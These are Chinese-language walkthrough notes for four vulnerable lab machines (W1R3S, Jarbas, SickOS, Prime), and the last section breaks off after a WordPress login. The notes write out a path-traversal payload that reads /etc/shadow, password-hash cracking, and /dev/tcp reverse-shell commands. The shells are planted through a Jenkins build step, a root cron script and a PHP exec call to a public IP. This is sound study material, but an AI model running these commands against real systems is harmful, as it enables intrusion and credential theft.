W1R3S(思路为主)
信息收集
首先使用nmap探测主机,得到192.168.190.147
接下来扫描端口,可以看到ports文件保存了三种格式
其中.nmap和屏幕输出的一样;xml这种的适合机器
nmap -sT --min-rate 10000 -p- 192.168.190.147 -oA nmapscan/ports
使用grep命令搜索有端口的数据行。
grep open nmapscan/ports.nmap
grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' #打印第一列
grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',' #合并到行,用,分割
21端口是ftp文件传输协议的端口,可能存在匿名登录
22端口是ssh远程登录端口
80端口是web页面端口
3306是mysql数据库端口
将这些端口作为变量赋值给ports
ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo ports可以看到回显正常
接着详细信息扫描(分析重点)
nmap -sT -sV -sC -O -p21,22,80,3306 192.168.190.147 -oA nmapscan/detail
然后扫描UDP
nmap -sU --top-ports 20 192.168.190.147 -oA nmapscan/udp #扫描常见的20个端口
然后nmap的默认脚本扫描
nmap --script=vuln -p21,22,80,3306 192.168.190.147 -oA nmapscan/vuln
接下来尝试ftp匿名登录(21端口),然后用户名输入anonymous(匿名的意思) 密码为空
ftp 192.168.190.147
ftp> binary #切换成二进制模式,不然下载的文件可能是坏的
ftp> ? #查看可以用的命令
ftp> prompt #关闭交互模式
发现content目录,进入之后里面有三个txt文件:01.txt 02.txt 03.txt
mget *.txt #一次下载这三个文件
接着切换到docs目录,下载里面的worktodo.txt文件
get worktodo.txt
然后切换到new-employees目录,下载里面的employee-names.txt文件。之后quit即可
cat这些文件
第一个字符串用hash-identifier检查是md5 解密之后是: This is not a password
第二个是base64 解密之后是:It is easy, but not that easy…
80端口的web页面是ubuntu的默认页面,里面也没有线索
3306的mysql端口也没有线索
接下来尝试目录爆破,使用gobuster进行爆破,字典选择kali自带的
sudo gobuster dir -u http://192.168.190.147 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
扫描wordpress/wp-login.php目录和/administrator/installation/目录
在administrator/installation/目录下暴露了是cuppa CMS ,也可以使用whatweb进行指纹识别得到
使用searchsploit搜索,并下载结果
searchsploit cuppa cms查找历史漏洞
查看内容,发现有任意文件读取
http://192.168.190.147/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
有回显但是没有显示/etc/passwd内容,再试试下面那个moreover部分
使用curl提交post请求: 发现etc/passwd的内容
curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.190.147/administrator/alerts/alertConfigField.php
接着获取/etc/shadow中的内容
curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.190.147/administrator/alerts/alertConfigField.php
可以发现两个明显的用户信息,上面还有一个root账户
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
保存到shadow.hash中,使用John破解
john shadow.hash
破解了两个用户www-data和w1r3s
接下来尝试登录w1r3s账户,密码是computer 成功登录
ssh w1r3s@192.168.190.147
whoam
uname -a
id
sudo -l
发现已经具有root权限,以系统权限运行/bin/bash sudo /bin/bash
然后就具有root权限了
切换到/root目录,即可得到flag
JARBAS-jenkins(典型CMS)
首先进行网段扫描,,得到靶机虚拟主机ip:192.168.136.132
arp-scan -l
或
nmap -sn 192.168.136.0/24
端口扫描
nmap --min-rate 10000 -p- 192.168.136.132
得到如下常规端口
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
然后扫描得到的端口:nmap -sT -sV -O -p22,80,3306,8080 192.168.136.132
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
尝试扫描UDP端口但是都关闭:nmap -sU -p22,80,3306,8080 192.168.136.132
接着尝试脚本扫描:nmap --script=vuln -p22,80,3306,8080 192.168.136.132
PORT STATE SERVICE
80/tcp open http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.136.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/njarb_data/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/njarb_data/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/njarb_data/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/njarb_data/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.136.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|_ http://192.168.136.132:80/index_arquivos/?C=M%3BO%3DD%27%20OR%20sqlspider
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.136.132
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.136.132:80/
| Form id: wmtb
| Form action: /web/submit
|
| Path: http://192.168.136.132:80/
| Form id:
| Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|
| Path: http://192.168.136.132:80/
| Form id:
|_ Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
222/tcp closed rsh-spx
3306/tcp open mysql
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
80端口是一个CMS,8080端口是一个管理端登录页面,还发现一个robots.txt协议,robots.txt协议中说不希望机器人点击"build"按钮
目录爆破
dirb http://192.168.136.133
dirsearch -u http://192.168.136.133
gobuster -u http://192.168.136.133 -w /usr/share/wordlists/dirbuster/dirctory-list-1.0.txt
只扫描到index.html和access.html
index.html就是正常的80端口首页,access.html出现了下面这个,意思是凭据被安全地加密了。使用hash-identifier判断是MD5加密,使用在线工具解决
md5解密之后如下
tiago:italia99
trindade:marianna
eder:vipsu
前两个都无效,第三个可以登录
在创建任务中发现build(构建),联想到robots.txt中说不希望自动化工具在这里build
选择执行shell,写入bash交互/bin/bash -i >& /dev/tcp/192.168.136.131/4444 0>&1,在kali的4444端口开启监听
点击立即构建,在kali中可以看到上线
获取权限
whoami //回显是jenkins
uname -a //查看系统,是jarbas,为linux系统
ip -a ifconfig dbkg -l //都没有这些命令
sudo -l //查看系统有哪些权限,提示也是没有任何权限
cat /etc/passwd //查看有哪些用户,发现有root权限,当前用户为jenkins没有任何权限
cat /etc/crontab //查看自动任务!!!!!
最下面这行的意思是以root权限每五分钟执行这个脚本,并丢弃的意思,cat /etc/script/CleaningScript.sh查看内容
内容是:rm -rf /var/log/httpd/access_log.txt即删除这个日志文件
尝试直接覆盖这个CleaningScript.sh文件
echo "/bin/bash -i >& /dev/tcp/192.168.136.131/4443 0>&1" >> /etc/script/CleaningScript.sh (在此之前要再开一个窗口先监听4443端口)
正常会在后五分钟之内监听上线,实现反弹shell
得到root权限,接下来直接ls cat flag.txt即可
SickOS
端口扫描
虚拟机ip:192.168.136.134
nmap --min-rate 10000 -p- 192.168.136.134 #得到22,3128,8080端口
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
nmap -sT -sV -sC -O -p22,3128,8080 192.168.136.134 #详细扫描
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.19
8080/tcp closed http-proxy
nmap -sU --top-ports 20 192.168.136.134 #扫描UDP端口
nmap --script=vuln -p22,3128,8080 192.168.136.134 #使用默认脚本扫描
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:08:4F:09 (VMware)
访问3128端口,提示报错,但是下面提示squid
搜索squid是一种代理协议
目录爆破
dirsearch -u http://192.168.136.134 #扫描不到任何东西
#接下来尝试使用代理服务器扫描
dirb http://192.168.136.134 -p http://192.168.136.134:3128
---- Scanning URL: http://192.168.136.134/ ----
+ http://192.168.136.134/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.136.134/connect (CODE:200|SIZE:109)
+ http://192.168.136.134/index (CODE:200|SIZE:21)
+ http://192.168.136.134/index.php (CODE:200|SIZE:21)
+ http://192.168.136.134/robots (CODE:200|SIZE:45)
+ http://192.168.136.134/robots.txt (CODE:200|SIZE:45)
+ http://192.168.136.134/server-status (CODE:403|SIZE:296)
接下来需要修改浏览器代理才能访问
成功进入web页面
web渗透
无任何线索,在robots.txt页面发现/wolfcms目录,进入之后发现是一个Wolf CMS页面
点击文章会出现跳转,在谷歌搜索wold cms admin path 可以搜到CVE漏洞
http://192.168.136.134/wolfcms/?/admin/plugin/file_manager/browse/
进入之后会跳转到登录页面
直接弱口令,账户密码都是admin,即可登录
里面有很多文件可以修改,可以尝试写php反弹shell
在articles中写入一句话木马反弹shell
保存之后需要点击旁边的放大镜才会执行,此时会跳转到其他页面,kali端可以看到已经上线。
ex\ec("/bin/bash -c 'bash -i >& /dev/tcp/122.51.15.95/1234 9>&1'");
提权
uname -a #查看系统版本信息
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
ls -laih
264349 drwxr-xr-x 5 root root 4.0K Dec 5 2015 .
264214 drwxrwxrwx 3 root root 4.0K Dec 6 2015 ..
264579 -rwxr-xr-x 1 root root 950 Dec 5 2015 .htaccess
264538 -rwxrwxrwx 1 root root 4.0K Dec 5 2015 CONTRIBUTING.md
264416 -rwxrwxrwx 1 root root 2.4K Dec 5 2015 README.md
264352 -rwxrwxrwx 1 root root 403 Dec 5 2015 composer.json
264514 -rwxrwxrwx 1 root root 3.0K Dec 5 2015 config.php
264639 drwxrwxrwx 2 root root 4.0K Dec 5 2015 docs
264537 -rwxrwxrwx 1 root root 894 Dec 5 2015 favicon.ico
264627 -rwxrwxrwx 1 root root 6.7K Dec 5 2015 index.php
264544 drwxrwxrwx 4 root root 4.0K Dec 6 2015 public
265378 -rwxrwxrwx 1 root root 0 Dec 5 2015 robots.txt
264580 drwxrwxrwx 7 root root 4.0K Dec 5 2015 wolf
发现里面有个配置文件config.php,查看内容,发现一个数据库账户
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
cat /etc/passwd #passwd可以成功访问,但是shadow没有权限访问
#其中有/bin/bash环境的只有root和sickos
root:x:0:0:root:/root:/bin/bash !!!!
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh !!!!
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash !!!!
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
现在已知数据库密码为 john@123 再开一个窗口尝试ssh登录sickos账户
ssh sickos@192.168.136.134
密码为john@123成功登录
sudo -l #查看权限 已经具有所有权限
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sickos may run the following commands on this host:
(ALL : ALL) ALL
sudo su 成功
flag在/root目录,直接cat 即可
Prime
目标靶机ip为:192.168.136.135
端口扫描
nmap --min-rate 10000 -p- 192.168.136.134
扫描到22和80端口
nmap -sT -sV -sC -O -p22,80 192.168.136.135
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
nmap --script=vuln -p22,80 192.168.136.135
目录爆破
dirsearch -u http://192.68.136.135 #发现是wp
[19:54:40] 200 - 131B - /dev
[19:54:43] 200 - 137B - /image.php
[19:54:44] 301 - 323B - /javascript->http://192.168.136.135/javascript/
[19:54:50] 403 - 303B - /server-status
[19:54:50] 403 - 304B - /server-status/
[19:54:55] 200 - 4KB - /wordpress/
[19:54:55] 200 - 1KB - /wordpress/wp-login.php
dev目录中回显,意思应该是要继续深挖
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
由于前面是扫描目录,不会扫描出文件,使用dirb加参数扫描.zip或.txt类型的文件
dirb http://192.168.136.135 -X .zip,.txt
START_TIME: Tue Oct 22 20:23:54 2024
URL_BASE: http://192.168.136.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.136.135/ ----
+ http://192.168.136.135/secret.txt (CODE:200|SIZE:412)
扫描得到secret.txt文件,内容如下:要对每个php文件进行fuzz测试,如果得到参数,进行下一步。
还提示一个location.txt文件和 Fuzz工具wfuzz(kali自带)
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//
利用网站中所给命令进行扫描
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.136.135/index.php?FUZZ=
这种为136CH的为失败情况
过滤一下136
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.136.135/index.php?FUZZ
扫描得到一个file
当访问该file文件时,又提示挖错文件了
将前面的location.txt拼接上,得到回显。意思是在其他php页面中,加上secrettier360参数。使用前面的image.php
Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun.
访问http://192.168.136.135/image.php?secrettier360 提示使用了正确参数
文件包含漏洞利用
这里直接?secrettier360 =/etc/passwd 就直接读取了。或者穿越三层目录以上也可以读取到
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
其中root和victor有/bin/bash权限。而且还有个password.txtsaket:x:1001:1001:find password.txt file in my directory:/home/saket:
查看其中信息secrettier360=/home/saket/password.txt回显是follow_the_ippsec不知道是干什么的
wordpressCMS渗透
wordpress页面中也有一个victor。尝试登录后台/wordpress/wp-login.php>
账户victor 密码follow_the_ippsec 成功登录后台
